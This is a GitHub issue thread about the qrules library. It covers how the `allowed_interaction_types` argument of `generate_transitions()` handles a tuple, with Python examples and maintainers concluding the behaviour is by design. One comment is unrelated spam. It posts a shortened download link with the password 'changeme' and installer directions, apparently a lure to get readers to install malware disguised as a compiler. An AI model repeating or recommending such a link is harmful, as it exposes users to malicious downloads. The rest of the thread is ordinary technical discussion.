### ISSUE TITLE
Bug in `allowed_interaction_types` argument to `generate_transitions()`

### ISSUE THREAD

**Issue by redeboer** [ComPWA/qrules#285]
As noted by/with @MartinTum, setting `allowed_interaction_types` in `generate_transitions()` does not work as expected when using a `tuple` (setting the interaction type per node).

<details>
<summary>Imports and particle database definition</summary>

```python
import graphviz
import qrules
from qrules.particle import Particle, Spin
from qrules.settings import InteractionType
from qrules.transition import StateTransitionManager


Tcc1_4430 = Particle(
    name="Tcc̅1(4430)⁺",
    pid=99999999999,
    latex=R"\mathit{T}_{c\overline{\mathit c}1}(4430)^+",
    spin=1,
    mass=4.478,
    width=0.181,
    charge=+1,
    isospin=Spin(1, +1),
    parity=+1,
    c_parity=-1,
    g_parity=+1,
)
particle_database = qrules.load_pdg()
particle_database += Tcc1_4430
```

</details>

```python
reaction = qrules.generate_transitions(
    initial_state="B0",
    final_state=["J/psi(1S)", "pi+", "K-"],
    allowed_intermediate_particles=["K(0)", "K*", "Tc", "f(0)"],
    allowed_interaction_types=("weak", "strong"),  # <-- problem here
    particle_db=particle_database,
)
```

![Image](https://github.com/user-attachments/assets/1f93a316-feea-40fd-9a39-4e270a583064)

Using the STM directly does result in the correct behaviour:

```python
stm = StateTransitionManager(
    initial_state=["B0"],
    final_state=["J/psi(1S)", "pi+", "K-"],
    particle_db=particle_database,
)
stm.set_allowed_interaction_types([InteractionType.WEAK], node_id=0)
stm.set_allowed_interaction_types([InteractionType.STRONG], node_id=1)
problem_sets = stm.create_problem_sets()
reaction = stm.find_solutions(problem_sets)
```

![Image](https://github.com/user-attachments/assets/2bed73b8-e5f8-4ade-81f3-9680c2d8e03e)

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by grayson-helmholz** [comment]
Isn't there a semantic difference when one version applies the `allowed_interaction_types` to all nodes and the other version applies them per node?

**Comment by redeboer** [comment]
Yes, the examples described above should produce exactly the same result.
You're right to point out that a dictionary for `allowed_interaction_types` would be clearer though, https://github.com/ComPWA/qrules/issues/290.

**Comment by grayson-helmholz** [comment]
As mentioned above, this behaviour is not due to a bug but a unflexible API and will be adressed in #290 .
Closing the issue.

**Comment by redeboer** [comment]
Indeed, my assumption in https://github.com/ComPWA/qrules/issues/285#issuecomment-2402755577 is incorrect. The example is behaving as it is currently designed, i.e. the list of `str` descriptions of the interaction type descriptions is not per-node, but is the union of interaction types that are applied.
